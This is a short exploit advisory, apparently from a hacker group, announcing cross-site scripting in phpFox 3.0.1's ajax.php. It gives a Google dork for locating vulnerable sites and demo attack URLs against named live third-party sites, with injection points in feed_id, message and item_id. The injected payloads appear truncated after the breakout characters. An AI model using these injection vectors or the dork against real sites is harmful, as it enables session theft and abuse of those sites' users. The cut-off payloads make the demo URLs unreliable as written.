# Exploit Title: phpFox Version 3.0.1 Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered By phpFox Version 3.0.1" # # Date: 09/04/2012 # # Author: Crim3R & Ajax Security Team # # Home : Http://WwW.AjaxTm.com/ # # Vendor Home : http://www.phpfox.com/ # # Tested on: all # ================================== [+] There is a lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title & ... D3m0: http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=">&width=300 http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=">&item_id=518&_=1346525603467 http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518">&_=1346525603467 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369